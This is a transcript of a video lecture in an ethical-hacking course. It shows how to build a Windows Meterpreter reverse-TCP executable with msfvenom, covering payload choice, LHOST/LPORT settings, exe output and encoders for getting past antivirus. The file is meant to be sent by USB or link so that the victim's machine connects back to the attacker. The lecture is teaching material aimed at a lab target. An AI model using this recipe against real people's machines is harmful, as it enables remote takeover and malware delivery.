Hello everybody and welcome back, and let us see some of the examples of actually crafting the payload for Windows interpreter shell. So we already were introduced to the MSFvenom tool, which allows us to create our own payloads, but we only did that in the PHP interpreter attack, where we executed the interpreter shell with the command injection and PHP code injection. But right now, let's see how you can hack any Windows machine with delivering the payload basically over a USB drive, or basically just sending a link to someone for someone to download, and when they execute it, they automatically connect back to you. So this will be an attack that is based on every Windows, and as a target, we will use my Windows 10 host machine. Now, Windows 10 is the newest Windows version, so you will see that it works even on the newest ones, since it is a payload that gets executed by the target, so they have to open it in order for them to connect back to us. So first of all, what we want to do is basically just type here msfvenom, and we will get a bunch of these options that we need to use in order to specify some of the things that our payload will have. So we were already introduced to some of them, such as lhost, lport, and minus p for the payload. As we can see, this is a option that we always specify, so what type of payload we want. And what after that, we specify some of the payload options, such as localhost, which is the IP address of our Kali Linux machine, and local port, which is the listening port of our Kali Linux machine. Now the IP address is basically the output of ifconfig, and the local port can be any port you specify that isn't actually used. So by default, as I said, the Metasploit chooses the port 4444, so we will stick with that. So let us actually just open up our MSF console for a second to see what are our available payloads. Now in order to craft the payload, you need to know the name of the payload itself. So the most used one is the Windows/Meterpreter/Reverse TCP, since it actually connects back to us over TCP and allows us to run our commands over Meterpreter shell. But that is not the only payload that is used for Windows, there are a bunch of others. We will just type here search Windows payloads. So let me just... Or we can just type here search payloads, and what we will do, let me just first unzoom this so it looks a little bit prettier. We want to find Windows. Wait, these are not payloads. Search payloads. Why payload? Wait. So let me say if I type here search payload. Okay. Payload, okay, so here they are. Let me just zoom out once again, and we can see all of the payloads for all operating systems. So this is not only for Windows, this is basically also for Linux, or you can see here the PHP as well. Let me just show you, there is the payload that we used in the previous videos. So PHP Meterpreter Reverse TCP, so this is the payload that we are already familiar with. But what we want to do now is search the search payload and then Windows and then press enter, and so we can only get the Windows payloads right here. Now most of these you will most likely never use. The, as I said, the most important ones and the ones that we will use right now are these two. So Windows x64-bit Meterpreter Reverse TCP. Now that is the Meterpreter payload for the x64 or 64-bit Windows, and we also need the Windows Meterpreter regular shell. So that is the, let me just find it, reverse TCP, here it is. So this is the regular one for the 32-bit Windows. Now you will see that it does matter which one you use, but basically if you use a 32-bit on 64-bit machine, it won't make such a problem unless we are running our Eternal Blue exploit, which I will show you later. But if you just run a simple payload as an executable that target executes, you can both use 64-bit and 32-bit on a 64-bit machine. but you will not be able to run a 64-bit meterpreter shell on a 32-bit machine. So that is also useful to know. The one that we will use is this one. So let us just copy it, since that is the payload that we will use. And right now, let us exit the MSF console and just let me just zoom it once again so you can see better. And let's type here MSFvenom dash dash help once again. We want to use this option. The next option that we can possibly use is the encoder, so we can encode our payload if we want to. Basically, it is not necessary. It can actually bypass some antiviruses, but most of the encoders are actually old ones, so they're already familiar. I mean, antiviruses are already familiar with them, so it's not really that good of a use to use them, but we can use them if you want to. So let me just cd to the user share Metasploit trainer modules encoders cdx64. Actually want to go to the cd86, and we can choose any encoder we want. Now the most important one is the Shikataganai encoder, but that really basically doesn't do anything, since it is already well known by the antivirus companies. First of all, since my Windows 10 machine is actually a 64-bit machine, I will use a 64-bit. So let's see what we have here. We will, for example, use this sudo dekiru.ruby. So we will use that. But first of all, let me show you how it looks like when there is no encoder. So msfvenom minus p for the payload, and we want to use Windows x64 meterpreter reverse TCP. So if you just select this, it will basically make a simple payload, I believe, with automatically specify DEL host and L port, or it may actually show you an error that you didn't specify it. So we will specify it just in case. Let me just check out my IP address first, which is the 192.168.1.4. So your IP address is the L host. So let us type here once again. So msfvenom minus p, and then our payload, which I will use 64-bit reverse TCP meterpreter. Then we specify L host equals 192.168.1.4. Now that we did that, next thing we want to specify is the L port. Now, as I said, by default, meterpreter or Metasploit uses 4444, but if you want to, you can change this, since some systems can actually block this port, since it is a well-known Metasploit port. So it can be a bypass measure if you simply just change this port, though you do not have to really. We will stick with 4444 for now on. And what you want to type here is minus F after that, and then exe, which stands for file to be the exe file. Then we specify the arrow to the right, and then we name our shell, or reverse shell, or interpreter shell, however you want to call it. We will name it reverse.exe. If we click enter right here, it will create a shell for us. Now, what you want to do, basically, we will upload this in the next video to the VirusTotal, which is a website that is used to scan the programs, or your viruses, in order to see how many viruses detect this. Now, let us just create this so you can see the size of this. As we can see, the payload size is 510 bytes, and the final size of the exe file is 7000 bytes. So if you just type here ls and you cat the reverse.exe, basically it will be some scrambled code. So this is just how to create the simple payload for Windows. In the next lecture, I will show you how actually detectable this is, and it is, trust me, a lot detectable. Like, 90% of antivirus will catch this, since it is something that everyone that uses Kali Linux made at some point and used, and it is well known in the databases of antiviruses. But we will see what actions we can take in order to make it less detectable, using, for example, encoders, or basically just editing the binary itself. but more about that in the next video. So I hope I see you there and take care. Bye.